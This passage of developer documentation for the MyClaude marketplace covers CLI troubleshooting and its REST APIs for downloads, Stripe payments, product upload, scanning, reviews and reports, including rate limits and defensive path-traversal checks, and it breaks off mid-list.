```bash $ myclaude search "product name" ``` Products published via CLI start in `pending_review` status. They are not installable until approved by a MyClaude admin. ### "Error: purchase required." **Cause:** You are trying to install a paid product that you have not purchased. **Solution:** Run the install command and complete the purchase flow: ```bash $ myclaude install @creator/product # @creator/product requires purchase ($4.00) # Opening checkout... [browser opens] ``` The CLI opens Stripe Checkout in your browser. After payment, installation resumes automatically. ### Installed product files not visible to Claude Code **Cause:** The product was installed to a directory that Claude Code does not scan, or Claude Code needs to be restarted to pick up new files. **Solution:** Verify the install path: ```bash $ myclaude list # @creator/product 1.0.0 skill .claude/skills/product/ ``` Ensure the install path is under `.claude/` in your project root. If it is, restart your Claude Code session -- it discovers installed skills on startup. ### "Error: checksum mismatch." **Cause:** The downloaded file does not match the SHA-256 checksum published with the product. This could indicate a corrupted download or a tampered package. **Solution:** Retry the install: ```bash $ myclaude install @creator/product --force ``` If the checksum mismatch persists, report it on [GitHub](https://github.com/anthropics/myclaude-cli/issues). Do not use the product until the issue is resolved. ### Product installed but outdated version **Cause:** A specific version was pinned in a previous install, or the lockfile references an older version. **Solution:** Update the specific product to its latest version: ```bash $ myclaude update @creator/product # @creator/product: 1.0.0 -> 1.2.0 # Updated. ``` Or check what version is installed first: ```bash $ myclaude list # @creator/product 1.0.0 skill .claude/skills/product/ $ myclaude info @creator/product # Version: 1.2.0 (latest) ``` ### "Error: path traversal detected in archive." **Cause:** The product archive contains file paths that attempt to escape the install directory (e.g., paths containing `..`). This is a security check that prevents malicious packages from writing files outside the expected location. **Solution:** This is a safety mechanism. Do not install the product. Report it on [GitHub](https://github.com/anthropics/myclaude-cli/issues) with the product handle. ### "Error: archive exceeds maximum file count." **Cause:** The product archive contains more than 1000 files. This limit exists to prevent zip bombs and excessively large packages. **Solution:** This is a product-side issue. If you are the creator, reduce the file count by consolidating files or excluding unnecessary content via `.vaultignore`. If you are a buyer, contact the product creator. ## Network issues ### "Error: network timeout." **Cause:** The CLI could not reach the MyClaude API or Firebase Auth servers within the default timeout period. **Solution:** Check your internet connection, then retry. If you are behind a corporate proxy, configure it: ```bash $ export HTTPS_PROXY=http://proxy.company.com:8080 $ myclaude search "test" ``` The CLI respects the standard `HTTPS_PROXY` and `HTTP_PROXY` environment variables. ### "Error: cannot reach VAULT servers." **Cause:** DNS resolution failed or the MyClaude API is unreachable. **Solution:** Verify connectivity to the API endpoint: ```bash $ curl -I https://myclaude.sh/api/health ``` If this fails, the issue is network-level (firewall, DNS, or outage). Check [status.myclaude.sh](https://status.myclaude.sh) for service status. ### Slow downloads behind a VPN **Cause:** VPN routing can add latency to connections to Firebase Storage and Cloudflare R2. **Solution:** If possible, allowlist the following domains in your VPN split-tunnel configuration: - `myclaude.sh` - `firebasestorage.googleapis.com` - `identitytoolkit.googleapis.com` - `securetoken.googleapis.com` ### SSL certificate errors behind corporate proxy **Cause:** Corporate proxies that perform TLS inspection replace upstream SSL certificates with their own. Node.js does not trust these certificates by default. **Solution:** Point Node.js to your corporate CA bundle: ```bash $ export NODE_EXTRA_CA_CERTS=/path/to/corporate-ca.pem $ myclaude search "test" ``` Add this export to your shell profile for persistence. Do not set `NODE_TLS_REJECT_UNAUTHORIZED=0` -- this disables all certificate verification and is a security risk. ## Platform-specific issues ### macOS: "myclaude" blocked by Gatekeeper **Cause:** On rare occasions, macOS Gatekeeper may quarantine globally installed npm binaries. **Solution:** Remove the quarantine attribute: ```bash $ xattr -d com.apple.quarantine "$(which myclaude)" ``` ### Linux: "Error: DBUS_SESSION_BUS_ADDRESS not set" **Cause:** The Secret Service API (used for keychain storage) requires a D-Bus session, which is not available in some terminal environments, particularly over SSH or in containers. **Solution:** Either start a D-Bus session manually or use `MYCLAUDE_TOKEN` for authentication: ```bash $ export MYCLAUDE_TOKEN="your-token-here" $ myclaude whoami ``` ### WSL: keychain not accessible from WSL2 **Cause:** WSL2 does not have direct access to Windows Credential Manager, and may not have a Linux keychain daemon running. **Solution:** The CLI falls back to file-based storage automatically. For explicit control, use `MYCLAUDE_TOKEN`: ```bash $ export MYCLAUDE_TOKEN="your-token-here" ``` Alternatively, install and start `gnome-keyring` in your WSL2 environment: ```bash $ sudo apt install gnome-keyring $ eval $(gnome-keyring-daemon --start) $ myclaude login ``` ## Diagnostic commands When reporting an issue, include the output of these commands: | Command | What it shows | |---------|--------------| | `myclaude --version` | CLI version | | `myclaude whoami` | Current auth state | | `myclaude list` | Installed products | | `myclaude config list` | All config values and sources | | `myclaude scan` | Validation issues in current directory | | `node --version` | Node.js version | | `npm --version` | npm version | | `npm bin -g` | Global bin path | For a comprehensive diagnostic, run them together: ```bash $ myclaude --version && node --version && npm --version && myclaude whoami && myclaude config list ``` ## Getting help - **GitHub Issues:** [github.com/anthropics/myclaude-cli/issues](https://github.com/anthropics/myclaude-cli/issues) -- bug reports and feature requests - **MyClaude Community:** [myclaude.sh/community](https://myclaude.sh/community) -- discussions and Q&A - **CLI help flag:** Every command supports `--help` for inline usage documentation: ```bash $ myclaude publish --help $ myclaude install --help ``` ## Related pages - [CLI Installation](/docs/cli/installation) -- requirements and first-time setup - [CLI Authentication](/docs/cli/authentication) -- token lifecycle and CI/CD auth - [CLI Configuration](/docs/cli/configuration) -- config file and environment variables - [CLI Commands Reference](/docs/cli/commands) -- complete reference for all 12 commands --- # Downloads API Product files are never served directly to the browser. Every download goes through a single endpoint that verifies authorization, checks purchase status for paid products, generates a time-limited signed URL, and tracks the download server-side. ## Download a product file Generate a signed URL for downloading a product's file. The URL expires after 5 minutes. ``` POST /products/download ``` **Auth:** Required (Bearer token) **Rate limit:** 30/min (strict) ### Request body ```json { "productId": "abc123" } ``` | Field | Type | Required | Description | |-------|------|----------|-------------| | `productId` | string | Yes | ID of the product to download | ### Response ```json { "url": "https://r2-signed-url.example.com/products/my-skill/my-skill.zip?X-Amz-...", "fileName": "my-skill.zip" } ``` | Field | Type | Description | |-------|------|-------------| | `url` | string | Presigned download URL. Valid for 5 minutes. | | `fileName` | string | Original file name for the download | The client should open this URL in a new tab or initiate a download. The URL becomes invalid after expiration or a single use (depending on storage provider configuration). --- ## Access rules The server applies different authorization rules based on the product's price and the requester's relationship to the product. | Scenario | Access granted | Verification | |----------|---------------|-------------| | **Free product, any authenticated user** | Yes | Auth token only | | **Paid product, product author** | Yes | Auth token + author UID match | | **Paid product, buyer with completed order** | Yes | Auth token + order lookup in `orders` collection | | **Paid product, no purchase** | No | Returns `403 Purchase required` | | **Unpublished product, author** | Yes | Auth token + author UID match | | **Unpublished product, non-author** | No | Returns `404 Product not found` | --- ## Download flow ``` Client sends POST /products/download | v Verify Bearer token (Firebase Admin verifyIdToken) | v Check user is not banned | v Fetch product from Firestore | +-- Not found or unpublished (non-author) --> 404 | v Is product paid AND requester is not author? | +-- Yes --> Check orders collection for completed purchase | | | +-- No order found --> 403 "Purchase required" | | | +-- Order exists --> Continue | +-- No (free or author) --> Continue | v Extract storage key from fileUrl | +-- Path traversal detected --> 400 | v Generate signed R2 URL (5-min expiry) | v Track download (fire-and-forget): +-- Write per-user download record (for review eligibility) +-- Increment product stats.downloads counter | v Return { url, fileName } ``` --- ## Storage architecture MyClaude uses a hybrid storage model. Product files are stored on **Cloudflare R2** (S3-compatible object storage). Presigned URLs are generated server-side using R2 credentials -- the bucket is never directly exposed to clients. ### File path format ``` products/{product-key}/{file-name}.zip ``` Examples: ``` products/code-review-skill/code-review-skill.zip products/my-agent/my-agent-v2.zip ``` ### Path security The server applies strict path validation before generating a signed URL: | Check | Rejects | |-------|---------| | Must start with `products/` | Paths outside the products directory | | No `..` sequences | Directory traversal attempts | | No `//` sequences | Double-slash path manipulation | If the stored `fileUrl` is in a legacy format (Firebase Storage download URL or `gs://` URI), the server extracts the storage key automatically. ### Why signed URLs | Concern | Solution | |---------|----------| | Prevent hotlinking | URLs expire after 5 minutes | | Access control | Server verifies purchase before generating URL | | No client-side secrets | R2 credentials stay server-side | | Direct download | File is served from R2 edge, not proxied through the API | --- ## Download tracking Every successful download triggers two asynchronous writes (fire-and-forget, non-blocking): | Write | Collection | Purpose | |-------|-----------|---------| | Per-user download record | `products/{productId}/downloads/{uid}` | Tracks which users downloaded. Used for **review eligibility** -- free products require a download before the user can submit a review. | | Download counter increment | `products/{productId}.stats.downloads` | Global download count displayed on product pages and used for sorting. | These writes use `merge: true` semantics, so repeated downloads by the same user update the timestamp without creating duplicates. --- ## Errors | Status | Condition | |--------|-----------| | 400 | Missing productId, invalid file reference, or path traversal detected | | 401 | Missing or invalid bearer token | | 403 | Paid product without a completed purchase order, or user is banned | | 404 | Product not found, not published (for non-authors), or no file associated | | 429 | Rate limit exceeded (30 downloads/min) | | 500 | Invalid file reference format (legacy URL parsing failure) | --- ## Example: download via CLI ```bash # Authenticate first $ myclaude login # Download a product by slug $ myclaude install code-review-skill ``` The CLI resolves the slug to a product ID, calls `POST /products/download`, and saves the file to the appropriate directory. ### Programmatic example ```bash # Get a Firebase ID token (example using firebase-tools) TOKEN=$(firebase auth:export-token) # Request a signed download URL curl -X POST https://myclaude.sh/api/products/download \ -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" \ -d '{"productId": "abc123"}' # Response: # { "url": "https://...", "fileName": "my-skill.zip" } # Download the file curl -L -o my-skill.zip "SIGNED_URL_FROM_RESPONSE" ``` --- ## Related pages - [API Overview](/docs/api/overview) -- Auth model, rate limits, error format - [Payments API](/docs/api/payments) -- How purchases are created (prerequisite for paid downloads) - [Products API](/docs/api/products) -- Upload and scan flow (before download is possible) - [Purchasing Guide](/docs/buyers/purchasing) -- Buyer-facing purchase and download walkthrough - [Security Model](/docs/security/model) -- Signed URL and storage security details --- # API Overview The MyClaude API is a REST interface for the Claude Code ecosystem marketplace. Every product listing, purchase, download, and social interaction on myclaude.sh flows through these endpoints. ## Base URL ``` https://myclaude.sh/api ``` All paths in this documentation are relative to this base. For example, `POST /products/download` means `POST https://myclaude.sh/api/products/download`. ## Authentication MyClaude uses **Firebase Authentication** with JWT bearer tokens. Every authenticated request must include a valid ID token in the `Authorization` header. ```http Authorization: Bearer ``` ### Obtaining a token | Method | How | |--------|-----| | **CLI** | Run `myclaude login` -- the CLI stores and refreshes your token automatically | | **Web app** | The Firebase Client SDK returns a token via `getIdToken()` after sign-in | | **Programmatic** | Exchange Firebase credentials using the Firebase Auth REST API | The server calls `admin.auth().verifyIdToken(token)` on every authenticated route. Expired or malformed tokens return `401`. Some endpoints also require **email verification** (`email_verified: true` on the decoded token). These are noted per-endpoint in the reference pages. ### Ban enforcement After token verification, the server checks whether the authenticated user is banned. Banned users receive `403 Forbidden` on all mutation endpoints. ## Endpoint groups | Group | Base path | Auth | Description | |-------|-----------|------|-------------| | [Products](/docs/api/products) | `/products/*` | Most routes | Upload, scan, download, like, review, approve | | [Users](/docs/api/users) | `/users/*` | Required | Profile updates, follow/unfollow, account deletion | | [Payments](/docs/api/payments) | `/stripe/*` | Required | Checkout, Stripe Connect onboarding, webhooks | | [Downloads](/docs/api/downloads) | `/products/download` | Required | Signed URL generation for product files | | CLI | `/cli/*` | Varies | Search (public), create product (auth), profile (auth) | | System | `/health` | None | Health check | ### CLI endpoints The CLI endpoints mirror web functionality but are optimized for command-line usage. | Endpoint | Method | Auth | Description | |----------|--------|------|-------------| | `/cli/products/search` | GET | None | Search published products with filters | | `/cli/products/create` | POST | Required | Create or update a product listing | | `/cli/auth/profile` | GET | Required | Return authenticated user profile | ### System endpoints | Endpoint | Method | Auth | Description | |----------|--------|------|-------------| | `/health` | GET | None | Returns `{ status: "ok" }` when Firebase and Stripe are reachable | ## Rate limiting All endpoints are rate-limited per IP address within a 60-second sliding window. MyClaude uses two rate limiting strategies. | Strategy | Behavior on limit failure | Used on | |----------|--------------------------|---------| | **Standard** | Fail-open (allows request if limiter is unavailable) | Read endpoints, search | | **Strict** | Fail-closed (blocks request if limiter is unavailable) | Checkout, upload, delete account, mutations | ### Rate limits by endpoint | Endpoint | Limit | Strategy | |----------|-------|----------| | `POST /stripe/checkout` | 10/min | Strict | | `POST /products/download` | 30/min | Strict | | `POST /products/upload` | 10/min | Strict | | `POST /products/scan` | 10/min | Strict | | `POST /products/like` | 30/min | Strict | | `GET /products/reviews` | 30/min | Standard | | `POST /products/reviews` | 5/min | Strict | | `POST /products/self-approve` | 20/min | Strict | | `POST /users/update-profile` | 5/min | Strict | | `POST /users/follow` | 30/min | Strict | | `DELETE /users/delete-account` | 1/min | Strict | | `POST /stripe/connect` | 5/min | Strict | | `POST /reports` | 10/min | Strict | | `GET /messages` | 60/min | Standard | | `POST /messages` | 20/min | Strict | | `GET /messages/:id` | 60/min | Standard | | `GET /cli/products/search` | 30/min | Standard | | `GET /cli/auth/profile` | 30/min | Standard | | `POST /cli/products/create` | 5/min | Strict | When rate-limited, the API returns: ```json { "error": "Too many requests" } ``` **Status:** `429 Too Many Requests` **Header:** `Retry-After: ` ## Error response format All errors follow a consistent JSON structure: ```json { "error": "Human-readable error message" } ``` Some validation endpoints include additional detail: ```json { "error": "Content policy violation", "issues": ["Description of issue 1", "Description of issue 2"] } ``` ### HTTP status codes | Code | Meaning | When | |------|---------|------| | `200` | Success | Request completed | | `400` | Bad Request | Missing or invalid parameters, business rule violation | | `401` | Unauthorized | Missing or invalid bearer token | | `403` | Forbidden | Valid token but insufficient permissions, or user is banned | | `404` | Not Found | Resource does not exist or is not published | | `409` | Conflict | Duplicate action (already purchased, already reviewed, username taken) | | `429` | Too Many Requests | Rate limit exceeded | | `500` | Internal Server Error | Unexpected server failure | | `503` | Service Unavailable | Dependency unavailable (Stripe, Firestore) or strict rate limiter failure | ## OpenAPI specification A machine-readable OpenAPI 3.1 specification is available at: ``` https://myclaude.sh/specs/openapi.yaml ``` ## Content types All request and response bodies use `application/json` unless otherwise noted. File uploads use presigned URLs rather than multipart form data -- see the [upload flow](/docs/api/products#upload-a-product-file) for details. ## Related pages - [Products API Reference](/docs/api/products) -- Upload, search, like, review, approve - [Users API Reference](/docs/api/users) -- Profile, follow, account deletion - [Payments API Reference](/docs/api/payments) -- Checkout, Stripe Connect, webhooks - [Downloads API Reference](/docs/api/downloads) -- Signed URL download flow - [Security Model](/docs/security/model) -- Architecture-level security details --- # Payments API MyClaude processes payments through Stripe Connect Express. The platform never handles raw card data -- all payment processing is delegated to Stripe (PCI DSS Level 1 certified). Orders are created exclusively by Stripe webhooks, never by client-side code. ## Purchase flow The complete purchase sequence involves four components: the buyer's browser, the MyClaude API, Stripe, and the webhook handler. ``` Buyer clicks "Buy" | v POST /stripe/checkout (Bearer token + productId) | +-- Verify auth token +-- Verify product exists, is published, is paid +-- Verify buyer has not already purchased +-- Verify seller has active Stripe account +-- Calculate platform fee (8%) +-- Create Stripe Checkout Session | v 302 Redirect to Stripe Checkout | v Buyer completes payment on stripe.com | v Stripe fires webhook: checkout.session.completed | v POST /stripe/webhooks (Stripe signature verification) | +-- Verify webhook signature +-- Re-verify price against database +-- Create order in Firestore (atomic, idempotent) +-- Update product stats (purchaseCount) +-- Update seller stats (totalRevenue, totalSales, +50 XP) +-- Update buyer stats (productsBought, +10 XP) | v Buyer returns to product page | v Download button appears (order verified server-side) ``` ## Create checkout session Create a Stripe Checkout Session for purchasing a paid product. Returns a URL that redirects the buyer to Stripe's hosted checkout page. ``` POST /stripe/checkout ``` **Auth:** Required (Bearer token) **Rate limit:** 10/min (strict) ### Request body ```json { "productId": "abc123" } ``` | Field | Type | Required | Description | |-------|------|----------|-------------| | `productId` | string | Yes | ID of the product to purchase | ### Response ```json { "url": "https://checkout.stripe.com/c/pay/cs_live_..." } ``` ### Validation checks The server performs these checks before creating a checkout session: | Check | Error if failed | |-------|----------------| | Product exists and is published | `404 Product not found` | | Product price > 0 | `400 Product is free` | | Buyer is not the product author | `400 Cannot purchase your own product` | | Buyer has not already purchased | `409 Already purchased` | | Seller has connected Stripe | `400 Seller has not connected Stripe` | | Seller's charges are enabled | `400 Seller's payment account is not active` | | Seller's payouts are enabled | `400 Seller's account verification is pending` | ### Platform fee The platform fee is calculated server-side as a constant: ``` Platform fee = 8% of product price Seller receives = 92% of product price ``` The fee is set as `application_fee_amount` on the Stripe PaymentIntent with `transfer_data.destination` pointing to the seller's connected account. ### Errors | Status | Condition | |--------|-----------| | 400 | Missing productId, free product, own product, seller not connected, or seller account issues | | 404 | Product not found or not published | | 409 | Already purchased | --- ## Stripe Connect onboarding Create a Stripe Connect Express account for the authenticated user, or generate a login/onboarding link if an account already exists. ``` POST /stripe/connect ``` **Auth:** Required (Bearer token) **Rate limit:** 5/min (strict) ### Request body None. ### Response (new account) ```json { "url": "https://connect.stripe.com/express/onboarding/...", "accountId": "acct_1234567890" } ``` ### Response (existing account, fully onboarded) ```json { "url": "https://connect.stripe.com/express/login/..." } ``` ### Response (existing account, onboarding incomplete) ```json { "url": "https://connect.stripe.com/express/onboarding/...", "accountId": "acct_1234567890" } ``` ### Behavior by account state | State | Action | |-------|--------| | No Stripe account | Creates Express account, returns onboarding link | | Account exists, not onboarded | Returns new onboarding link for existing account | | Account exists, fully onboarded | Returns Stripe dashboard login link | The created Stripe Express account is configured with `card_payments` and `transfers` capabilities. The `firebaseUid` is stored in the account metadata for webhook reconciliation. ### Errors | Status | Condition | |--------|-----------| | 401 | Missing or invalid token | --- ## Stripe callback Redirect endpoint called by Stripe after the user completes (or abandons) Connect onboarding. This is not called by API consumers directly. ``` GET /stripe/callback?account_id=acct_...&uid=... ``` **Auth:** None (redirect handler) ### Behavior 1. Retrieves the Stripe account and verifies `metadata.firebaseUid` matches the `uid` parameter. 2. Updates the user profile with `stripeAccountId` and `stripeOnboarded` status. 3. Redirects the user to `/sales?stripe=success` or `/sales?stripe=error`. --- ## Stripe webhooks Receives and processes events from Stripe. Webhook signature verification is mandatory -- unsigned or tampered events are rejected. ``` POST /stripe/webhooks ``` **Auth:** Stripe webhook signature (`stripe-signature` header) **Rate limit:** None (Stripe-initiated) ### Handled events | Event | Action | |-------|--------| | `checkout.session.completed` | Creates a new order in Firestore, updates product and user stats | | `charge.refunded` | Marks the order as refunded, reverses seller/buyer stats | | `account.updated` | Updates seller onboarding status when Stripe account becomes active | ### Order creation (`checkout.session.completed`) Orders are created inside a Firestore transaction with the Stripe session ID as the document ID, making the operation **idempotent**. If Stripe retries the webhook, duplicate orders are detected and skipped. The server re-verifies the product price against the database and cross-checks with `session.amount_total` from Stripe. If amounts diverge (e.g., price changed between checkout creation and webhook delivery), the discrepancy is logged but the order is still created using Stripe's actual charged amount. **Order document structure:** ```json { "buyerUid": "uid_buyer", "sellerUid": "uid_seller", "productId": "abc123", "productTitle": "Code Review Skill", "productCategory": "skills", "amount": 999, "platformFee": 80, "sellerAmount": 919, "currency": "usd", "stripeSessionId": "cs_live_...", "stripePaymentIntentId": "pi_...", "status": "completed", "createdAt": "2026-03-24T12:00:00.000Z", "updatedAt": "2026-03-24T12:00:00.000Z" } ``` All monetary values are in **cents** (e.g., `999` = $9.99). ### Refund processing (`charge.refunded`) When a charge is refunded through Stripe: 1. The order status is updated to `"refunded"` with a `refundedAt` timestamp. 2. Seller stats are decremented (`totalSales`, `totalRevenue`). 3. Buyer stats are decremented (`productsBought`). 4. The seller receives a notification about the refund. Refund processing is also idempotent -- already-refunded orders are skipped. ### Error handling | Scenario | Response | Stripe behavior | |----------|----------|-----------------| | Invalid signature | `400` | Stripe does not retry | | Missing metadata | `400` | Stripe does not retry | | Processing error (Firestore down) | `503` | Stripe retries with exponential backoff | | Duplicate order | `200` (skipped) | Stripe considers delivered | --- ## Pricing model | Component | Value | |-----------|-------| | Platform fee | 8% of product price | | Seller receives | 92% of product price | | Currency | USD only | | Minimum paid price | $1.00 (free products use price = 0) | | Maximum price | $9,999.00 | | Stripe processing fee | Standard Stripe fees apply (deducted by Stripe before payout) | The 8% platform fee is a server-side constant. It is never read from environment variables or client-side configuration. --- ## Security guarantees | Guarantee | Implementation | |-----------|---------------| | Orders created server-side only | Webhook handler is the sole order creation path | | Idempotent order creation | Firestore transaction with session ID as document ID | | Price verification | Server re-fetches product price, cross-checks Stripe amount | | Signature verification | `stripe.webhooks.constructEvent()` validates every webhook | | No raw card data | All payment UI is Stripe-hosted Checkout | | Seller verification | Charges and payouts must be enabled before checkout session creation | --- ## Related pages - [API Overview](/docs/api/overview) -- Auth model, rate limits, error format - [Downloads API](/docs/api/downloads) -- Post-purchase download flow - [Products API](/docs/api/products) -- Product operations - [Creator Monetization](/docs/creators/monetization) -- Revenue and payout details for creators - [Security Model](/docs/security/model) -- Platform security architecture --- # Products API The Products API covers every product lifecycle operation: searching the catalog, uploading files, scanning content, downloading purchased products, social interactions (likes and reviews), and publishing. ## Search products Search the published product catalog. No authentication required. ``` GET /cli/products/search ``` ### Query parameters | Parameter | Type | Required | Default | Description | |-----------|------|----------|---------|-------------| | `q` | string | No | `""` | Search query (matched against title, description, slug, tags). Max 200 chars. | | `category` | string | No | all | Filter by category. Valid: `skills`, `squads`, `agents`, `workflows`, `design-systems`, `claude-md`, `prompts`, `applications`, `systems` | | `author` | string | No | all | Filter by author username (leading `@` is stripped) | | `free` | string | No | `"false"` | Set to `"true"` to show only free products | | `sort` | string | No | `"relevance"` | Sort order: `relevance`, `newest`, `rating`, `price-asc`, `price-desc` | | `slug` | string | No | -- | Exact slug lookup (returns 0 or 1 result) | | `limit` | integer | No | `20` | Results per page (max 50) | | `offset` | integer | No | `0` | Pagination offset | ### Response ```json { "products": [ { "id": "abc123", "title": "Code Review Skill", "slug": "code-review-skill", "description": "Automated code review for Claude Code", "readme": "# Code Review Skill\n...", "license": "MIT", "category": "skills", "price": 0, "authorUid": "uid_abc", "authorUsername": "johndoe", "authorAvatar": "https://...", "authorDisplayName": "John Doe", "fileName": "code-review-skill.zip", "fileSize": 24576, "thumbnailUrl": "", "status": "published", "stats": { "downloads": 142, "likes": 37, "rating": 4.5, "reviewsCount": 12 }, "tags": ["code-review", "automation"], "createdAt": "2026-03-20T10:30:00.000Z", "updatedAt": "2026-03-22T14:15:00.000Z" } ], "total": 1, "limit": 20, "offset": 0 } ``` ### Errors | Status | Condition | |--------|-----------| | 429 | Rate limit exceeded (30/min) | --- ## Upload a product file Request a presigned upload URL for R2 storage. The client uploads the file directly to the returned URL via `PUT`. ``` POST /products/upload ``` **Auth:** Required (Bearer token) **Rate limit:** 10/min (strict) ### Request body ```json { "fileName": "my-skill.zip", "fileSize": 1048576, "productKey": "my-skill" } ``` | Field | Type | Required | Description | |-------|------|----------|-------------| | `fileName` | string | Yes | File name. Non-alphanumeric chars (except `.`, `-`, `_`) are sanitized. | | `fileSize` | number | Yes | File size in bytes. Max 50 MB (52,428,800 bytes). | | `productKey` | string | Yes | Unique key for the product (typically the slug). Sanitized to alphanumeric + `_-`. | ### Response ```json { "url": "https://r2-presigned-upload-url...", "key": "products/my-skill/my-skill.zip" } ``` The `key` value is used as `fileKey` when creating the product via `/cli/products/create` or as `storagePath` when scanning via `/products/scan`. ### Errors | Status | Condition | |--------|-----------| | 400 | Missing fields, invalid file size, or file exceeds 50 MB | | 401 | Missing or invalid token | | 403 | User is banned | --- ## Scan uploaded content Scan a ZIP file in storage for content policy violations before publishing. The server downloads the file from R2, inspects it, and returns scan results. Files that fail the scan are automatically deleted from storage. ``` POST /products/scan ``` **Auth:** Required (Bearer token) **Rate limit:** 10/min (strict) ### Request body ```json { "storagePath": "products/my-skill/my-skill.zip" } ``` | Field | Type | Required | Description | |-------|------|----------|-------------| | `storagePath` | string | Yes | R2 storage key. Must start with `products/` and end with `.zip`. | ### Response (safe) ```json { "safe": true, "fileTypes": [".ts", ".md", ".json"], "totalFiles": 12 } ``` ### Response (violation) ```json { "error": "Content policy violation", "issues": ["Executable binary detected in archive"] } ``` **Status:** `400` ### Errors | Status | Condition | |--------|-----------| | 400 | Invalid path, not a ZIP, file too large (>50 MB), invalid ZIP, or content violation | | 403 | Ownership check failed (file belongs to another user's product) | | 404 | File not found in storage | --- ## Toggle like Toggle a like on a published product. If the user has already liked the product, the like is removed. Uses a Firestore transaction for atomic counter updates. ``` POST /products/like ``` **Auth:** Required (Bearer token) **Rate limit:** 30/min (strict) ### Request body ```json { "productId": "abc123" } ``` ### Response ```json { "liked": true } ``` `liked: true` means the like was added. `liked: false` means it was removed (toggled off). ### Errors | Status | Condition | |--------|-----------| | 400 | Missing productId | | 404 | Product not found or not published | --- ## Get reviews Retrieve reviews for a product, ordered by most recent first. ``` GET /products/reviews?productId=abc123 ``` **Auth:** None required **Rate limit:** 30/min (standard) ### Query parameters | Parameter | Type | Required | Description | |-----------|------|----------|-------------| | `productId` | string | Yes | The product ID | ### Response ```json { "reviews": [ { "id": "uid_reviewer", "authorUid": "uid_reviewer", "authorUsername": "janedoe", "authorAvatar": "https://...", "authorDisplayName": "Jane Doe", "rating": 5, "comment": "Excellent skill, saves me hours every week.", "createdAt": "2026-03-21T08:00:00.000Z" } ] } ``` Returns up to 50 reviews per request. --- ## Submit a review Submit a review for a product. One review per user per product, enforced at the database level. ``` POST /products/reviews ``` **Auth:** Required (Bearer token) **Rate limit:** 5/min (strict) ### Prerequisites - **Paid products:** The user must have a completed purchase order. - **Free products:** The user must have a server-tracked download record. - The user cannot review their own product. ### Request body ```json { "productId": "abc123", "rating": 5, "comment": "Excellent skill, saves me hours every week." } ``` | Field | Type | Required | Constraints | |-------|------|----------|-------------| | `productId` | string | Yes | Must be a valid product ID | | `rating` | number | Yes | Integer 1--5 | | `comment` | string | Yes | 3--1000 characters | ### Response ```json { "success": true, "rating": 4.5, "reviewsCount": 13 } ``` `rating` is the new average rating for the product. `reviewsCount` is the updated total. ### Errors | Status | Condition | |--------|-----------| | 400 | Invalid rating or comment length | | 403 | Cannot review own product, purchase required (paid), or download required (free) | | 404 | Product not found | | 409 | Already reviewed this product | --- ## Self-approve product Verified users (email confirmed) can publish their own `pending_review` products. Accepts a single product ID or `"all"` to batch-approve all pending products. ``` POST /products/self-approve ``` **Auth:** Required (Bearer token, email must be verified) **Rate limit:** 20/min (strict) ### Request body (single) ```json { "productId": "abc123" } ``` ### Request body (batch) ```json { "productId": "all" } ``` ### Response ```json { "approved": 1 } ``` `approved` is the count of products moved from `pending_review` to `published`. ### Errors | Status | Condition | |--------|-----------| | 400 | Missing productId, or product is not in `pending_review` status | | 403 | Email not verified, or product belongs to another user | | 404 | Product not found | --- ## Create or update product (CLI) Create a new product listing or update an existing one. If the slug already belongs to the same author, the product is updated (version bump). If the slug belongs to a different author, returns `409`. The server runs a mandatory content scan on the uploaded file before creating the product. Rejected files are deleted from storage. ``` POST /cli/products/create ``` **Auth:** Required (Bearer token) **Rate limit:** 5/min (strict) ### Request body ```json { "title": "Code Review Skill", "slug": "code-review-skill", "description": "Automated code review for Claude Code projects", "category": "skills", "price": 0, "license": "MIT", "tags": ["code-review", "automation"], "fileKey": "products/code-review-skill/code-review-skill.zip", "fileName": "code-review-skill.zip", "fileSize": 24576, "version": "1.0.0", "readme": "# Code Review Skill\n\nThis skill provides...", "source": "cli" } ``` | Field | Type | Required | Constraints | |-------|------|----------|-------------| | `title` | string | Yes | Max 100 characters | | `slug` | string | Yes | Lowercase alphanumeric, hyphens, underscores. 1--50 chars. Must match `/^[a-z0-9][a-z0-9_-]*[a-z0-9]$/` | | `description` | string | Yes | Max 500 characters | | `category` | string | Yes | One of: `skills`, `squads`, `agents`, `workflows`, `design-systems`, `claude-md`, `prompts`, `applications`, `systems` | | `price` | number | Yes | 0--9999 USD | | `fileKey` | string | Yes | R2 storage key from upload step | | `fileName` | string | Yes | Original file name | | `fileSize` | number | Yes | File size in bytes (max 50 MB) | | `version` | string | Yes | Semver format (e.g. `1.0.0`) | | `license` | string | No | Default: `MIT`. Valid: `MIT`, `Apache-2.0`, `GPL-3.0`, `BSD-3-Clause`, `ISC`, `CC-BY-4.0`, `CC0-1.0`, `Proprietary`, `Custom`, and others | | `tags` | string[] | No | Max 10 tags, each max 30 characters | | `readme` | string | No | Markdown content (max 100 KB) | | `source` | string | No | `"cli"` or `"web"` | #### Optional enrichment fields | Field | Type | Default | Description | |-------|------|---------|-------------| | `mcsLevel` | number | `1` | MCS compatibility level (1, 2, or 3) | | `language` | string | `"en"` | Content language (max 10 chars) | | `longDescription` | string | `""` | Extended description (max 2000 chars) | | `installTarget` | string | `""` | Installation target path (max 200 chars, no path traversal) | | `compatibility` | object | `{ claudeCode: ">=1.0.0" }` | Compatibility requirements | | `dependencies` | object | `{ myclaude: [] }` | Dependency list (max 20 entries) | ### Response (new product) ```json { "productId": "xyz789", "slug": "code-review-skill", "status": "pending_review", "updated": false } ``` ### Response (updated product) ```json { "productId": "abc123", "slug": "code-review-skill", "status": "pending_review", "updated": true } ``` New products start with `status: "pending_review"`. Use [self-approve](#self-approve-product) to publish. ### Errors | Status | Condition | |--------|-----------| | 400 | Validation failure, file not found, file too large, invalid ZIP, or content scan failure | | 409 | Slug is taken by another author | --- ## Report content Report a product, review, or user for policy violations. ``` POST /reports ``` **Auth:** Required (Bearer token) **Rate limit:** 10/min (strict), plus max 5 reports per 24 hours per user ### Request body ```json { "targetType": "product", "targetId": "abc123", "reason": "malicious_content", "description": "Contains obfuscated code that exfiltrates environment variables." } ``` | Field | Type | Required | Constraints | |-------|------|----------|-------------| | `targetType` | string | Yes | `"product"`, `"review"`, or `"user"` | | `targetId` | string | Yes | ID of the target resource | | `reason` | string | Yes | `"malicious_content"`, `"spam"`, `"inappropriate"`, `"copyright"`, `"other"` | | `description` | string | No | Additional context (max 1000 chars) | ### Response ```json { "success": true } ``` ### Errors | Status | Condition | |--------|-----------| | 400 | Invalid targetType, missing targetId, or invalid reason | | 409 | Already reported this target | | 429 | More than 5 reports in the last 24 hours | --- ## Related pages - [API Overview](/docs/api/overview) -- Auth model, rate limits, error format - 